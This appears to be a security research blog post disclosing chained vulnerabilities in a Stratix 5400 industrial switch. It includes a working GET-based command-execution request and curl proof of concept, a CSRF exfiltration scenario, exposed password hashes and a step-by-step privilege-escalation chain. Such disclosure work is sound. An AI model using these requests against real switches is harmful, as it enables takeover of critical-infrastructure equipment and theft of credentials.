Executive Summary
While playing around with a Rockwell Stratix 5400 industrial Ethernet switch, I uncovered a series of vulnerabilities that, when chained together, allow complete device compromise with minimal effort.
Key Findings
| Vulnerability | Impact | Exploitability |
|---|---|---|
| GET-Based RCE (No CSRF) | Full command execution | Trivial - single HTTP GET |
| CSRF to RCE | Unauthenticated → RCE via CSRF | Easy - malicious webpage |
| Password Hash Exposure | Complete credential disclosure | Trivial - view HTML source |
| Privilege Escalation Chain | Read-only → Admin escalation | Easy - hash cracking |
Cisco Stratix 5400 Industrial Ethernet Switch - commonly deployed in critical infrastructure
Background: The Cisco Stratix 5400
The Cisco Stratix 5400 is an industrial-grade Ethernet switch designed for harsh environments including manufacturing facilities, utilities, oil & gas operations, and transportation systems.
Target Device Specifications:
- Model: 1783-BMS10CGP
Critical Finding #1: GET-Based Remote Code Execution (No CSRF Protection)
The Vulnerability
The web interface exposes a GET-based command execution endpoint that accepts arbitrary CLI commands without CSRF token protection:
Endpoint: /%24{variable}%0A?{variable}=<command>
Method: GET
Authentication: Required (HTTP Basic Auth)
CSRF Protection: NONE
Technical Details
The endpoint uses URL-encoded variable substitution:
%24=$(dollar sign)%0A=\n(newline)- Any variable name works:
a,b,c,d,cmd,command, etc.
Working pattern discovered:
GET /%24b%0A?b=show%20running-config HTTP/1.1
Host: 192.168.103.143
Authorization: Basic YWRtaW46U3RlcGhlbjEz
Response: 200 OK
Content-Length: 4700
[Full device configuration with passwords]
Proof of Concept
curl -k -u admin:password \
"https://192.168.103.143/%24b%0A?b=show%20version%20|%20include%20uptime"
# Returns:
stratix uptime is 11 hours, 42 minutes
Confirmed Working Commands
| Command | Output Size | Sensitive Data |
|---|---|---|
show running-config | 4,700 bytes | Passwords, SNMP strings, network config |
show startup-config | 3,354 bytes | Saved configuration |
show version | 2,921 bytes | IOS version, serial numbers |
show users | 142 bytes | Active sessions |
show ip interface brief | 820 bytes | Network topology |
dir flash: | 1,113 bytes | File system contents |
Critical Finding #2: CSRF Leading to Unauthenticated RCE
Because the RCE endpoint uses GET requests with no CSRF token, any webpage can trigger command execution when visited by an authenticated administrator.
Attack Scenario
- Attacker creates malicious webpage
- Sends link to network administrator
- Admin clicks link while logged into switch web interface
- Malicious JavaScript executes commands in admin's browser context
- Full device configuration exfiltrated to attacker's server
Critical Finding #3: Password Hash Exposure
The useraccounts.shtml page includes a hidden textarea that contains the output of SSI commands, exposing all user account password hashes in the HTML source code.
Vulnerable Code
<textarea style="display:none; visibility:hidden;" id="USER_SUMMARY">
<!--#exec cmd='more system:running-config | i user'-->
</textarea>
When rendered:
username admin privilege 15 secret 5 $1$P4Bi$8t74cAAknpCiVCvL7IC6T.
username vulntest privilege 5 secret 9 $9$wLzi8Cmi6aH91k$qOAH1kOzmLhTX1tKqGx/...
The Complete Attack Chain
Phase 1: Initial Access
Attacker obtains read-only credentials (default/weak passwords)
Phase 2: Information Disclosure
Access useraccounts.shtml → extract admin password hash from HTML source
Phase 3: Offline Password Cracking
Run hashcat on MD5-crypt hash → cracked in ~15 minutes with GPU
Phase 4: Admin Access
Login with cracked admin credentials → full web interface access
Phase 5: Remote Code Execution
Use GET-based RCE endpoint → extract all configuration, passwords, network topology
COMPLETE DEVICE COMPROMISE
Disclaimer: This assessment was performed on authorized equipment for security research purposes. All findings are reported in good faith to improve security.
This post is part of my ongoing ICS security research. For more projects and research, visit the ICS Projects page.